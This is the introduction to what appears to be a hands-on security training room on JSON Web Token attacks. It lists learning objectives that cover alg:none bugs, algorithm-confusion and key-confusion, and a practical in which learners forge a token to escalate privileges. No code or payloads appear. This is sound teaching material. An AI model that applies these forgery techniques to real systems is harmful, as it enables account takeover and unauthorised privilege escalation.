JSON Web Tokens (JWTs) are the de-facto standard for stateless authentication on the modern web. They're used by APIs, single-page apps, mobile clients, and microservices to prove who a request is coming from - without the server needing to remember anything between requests. That single property makes them attractive at scale, but it also means the entire trust model collapses onto one place: the verifier on the server.
When that verifier is wrong - even slightly - the consequences are not subtle. An attacker doesn't need to guess passwords, doesn't need to phish, doesn't need to find an SQL injection. They reshape the token, send it back, and the server happily treats them as any user they choose. In this room you'll see exactly how that happens, why it keeps happening more than a decade after the spec was written, and how to forge a JWT yourself in the practical at the end.
Learning objectives
- Understand why JWTs are stateless and what that means for the attack surface
- Recognise the three parts of a JWT and how each is encoded and what each is for
- Walk through the verification path the server takes for every incoming request
- Identify the alg:none class of bugs and why libraries kept shipping them for years
- Recognise algorithm-confusion and key-confusion attacks against asymmetric tokens
- Forge a working JWT in the practical and use it to escalate privileges on a target
Prerequisites
You should be comfortable with HTTP basics, base64 encoding, and reading JSON. A rough idea of what HMAC and RSA are will help, but everything you need is explained as we go.